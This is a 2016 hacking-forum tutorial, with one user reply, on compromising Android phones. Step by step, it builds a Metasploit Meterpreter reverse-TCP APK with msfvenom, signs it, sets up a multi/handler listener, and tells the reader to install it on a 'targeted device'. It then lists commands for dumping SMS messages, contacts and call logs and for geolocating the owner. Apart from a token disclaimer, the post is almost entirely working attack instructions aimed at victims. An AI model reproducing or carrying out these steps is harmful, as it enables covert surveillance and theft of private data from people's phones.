Kali Linux: How to Hack Any Android Device and Steal All Data From It.

[Snow]

Introduction

In this tutorial, I will be showing you how to hack into any Android Device, and stealing information from it. Some stuff that you can retrieve are:

• Get Call Logs
  
• Get SMS Messages
  
• Get Contact List
  
• Check If Android is Rooted
  
• Search for Files
  
• Add/Remove Files or Dictionaries
  
• Edit Files
  
• Take pictures with their cam.
  
• Read contents on their phone
  
• A ton more things you can check, remove, add, download, etc...
  
  

If you all haven't read my previous thread. You will need to have Metasploit installed on your Kali Linux. If you haven't installed it, you can go HERE to know how to install it to your Linux before starting this tutorial. This is for teaching purposes only for the community of DemonForums/NGU. If you haven't seen my other tutorials for Kali Linux or Linux Mint. You can find them in the Linux Section if you wish. If you have any suggestions on some tutorials/guides I should make, please give me feedback on my work. I really would appreciate to see what the community wants to see. Lets continue on the tutorial shall we?

---

Before We Start:

First thing you are going to need is the "SignApk File that you will have to download. You can go HERE to find the download link for that. Now, you should have the Sign.Apk file on your desktop. Next, we are going to create a .txt file that has this specific command you can call it for the time being. I will provide you the command right here so you can just copy and paste it to your .txt file:

msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > /root/Desktop/Android.apk

We are going to need that file in a minute or two. Make sure to save that to your desktop, and just name it android.txt . Now, we're going to get our own Internet Protocol Address (IP Address). Open up a New Terminal and type in "ifconfig"

root@kali:~# ifconfig

Once you hit enter/continue, you should see your data come up. On the left side, locate where it says "wlan0" on the second line find a line that says "inet addr: 192.168.XX.XX (or whatever your IP is). You're going to copy the IP Address ONLY: (192.168.XX.XX). Once that has been copied, we're going back to our desktop, and going inside the android.txt file we created. You're going to paste your IP Address right after the equal sign where it says "LHOST=" for normal visual this is the example it should look like:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.XX.XX LPORT=4444 R > /root/Desktop/Android.apk

Once your IP Address has been pasted, we're going to copy the whole command from there. Minimize your android.txt file, and make a New Terminal Window. Follow exactly how I do it:

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.XX.XX LPORT=4444 R > /root/Desktop/Android.apk

After about 5 seconds, you should see a "Android.apk" file show up on your desktop, that means you're on the right track with me. Wait a couple of more seconds, and you should see a payload size pop up under the command you pasted. Highlight on your terminal "Payload Size: XXXX bytes" right click on the Android.apk file and go to properties. It should be the exact same size as the one on your terminal.

---

Signing The Apk File:

Following from where we left off, continue on with the commands i'm about to input for you. Remember to only type in order the Black Bold Words I am typing:

root@kali: cd Desktop/SignApk
root@kaliDesktop/SignApk# ls
Android.apk certificate.pem cmd.exe key.pk8 signapk.jar Signing.txt
root@kaliDesktop/SignApk# 

From here, we're going to drag the Android.apk file from your Desktop into the SignApk. Just drag it, and drop it in there. Make sure you click "replace" after the tab pops up. Now, click on SignApk, and open the file. You should see multiple things inside that folder, but what we are looking for is the Signing.txt. Go into the Signing.txt file, and we're about to edit some things from it. When you open it this is what it should say:

jave -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk

We are going to replace the "your-app" with Android.apk and replacing also the "your-app-signed" with Android2.apk. As results, it should look like this:

jave -jar signapk.jar certificate.pem key.pk8 Android.apk Android2.apk

After, once you're done with the editing, you're going to copy the whole command. Go back to the original Terminal that we were using and paste the code. So this is where we left off, with the new command pasted:

root@kali: cd Desktop/SignApk
root@kaliDesktop/SignApk# ls
Android.apk certificate.pem cmd.exe key.pk8 signapk.jar Signing.txt
root@kaliDesktop/SignApk# jave -jar signapk.jar certificate.pem key.pk8 Android.apk Android2.apk

Then, go back into the SignApk File on your desktop, and drag the folder named "Android2.apk" to the desktop. Exit out that, and MINIMIZE YOUR TERMINAL. Please don't exit out of it. Just make sure you open a new terminal window, so you could have both up at the same, or the older one minimized for the time being.

---

Metasploit Framework:

Glad you made it this far soldier, once you're in your new window of your terminal, we are going to add some more commands. 

root@kali:~# msfconsole
[It should start the process of the framework here for a few seconds...]
Now, you're going to see a lot of words pop up, don't worry. Just follow these commands in order with Black Bold Words, and you'll be done very soon.

msf > use multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
(Go into the android.txt file we made earlier, and copy your IP Address from the LHOSt=192.168.XX.XX and paste it onto the command that we are doing right now after set LHOST XXX.XXX.XX.XX.)
msf exploit(handler) > set LHOST 192.168.XX.XX 
PAYLOAD => XXX.XXX.XX.XX
msf exploit(handler) > set LPORT 4444
PAYLOAD => 4444
msf exploit(handler) > exploit

---

Installation

We're at the end guys, now, all you have to do is install the Android2.apk file on to the targeted device you are going for. Right after the APP is fully running on the device you will start to gain all the information to your terminal. From here, in your terminal once your preset command comes up that says: 

meterpreter > 

Type in "help" to view alll the commands you can use to get the information of the android device. Right after that, the preset command "meterpreter >" should come up. For the command, type in sysinfo. You should get an unknown error command, just retype in sysinfo one more time, and you're completely in the whole device. From here, you can use all the commands to view the full android device data.

---

Few Commands:

Some commands that are very important if you're trying to get the data is the main things:

• dump_calllog = Get call logs from the device.
  
• dump_contacts = Check the phone's contacts.
  
• dump_sms = Check the phone's messages.
  
• geolocate = Get current lat-long using geolocation.
  

There are a lot more, but that's for you to lurk around, and try them out.

---

Conclusion:

That's it, you're officially done hacking the device. Need any more suggestions on what guides/tutorials I should make please feel free to drop a comment/PM me. Also remember to always keep in mind that it's your choice on how you use this method! If you tend to abuse them in a negative way, congrats your on your own, and i'm not responsible for your choices. Hope you all have a great day!

Cheers, Snow X Hydrogen
This tutorial was made by Snow/Hydrogen, and was meant for teaching purposes here on DemonForums/NGU ONLY.

© 2016 Snow/Hydrogen, DF/NGU

[Red]

This is another great tutorial man, I appreciate this. I'll have to try it out sometime.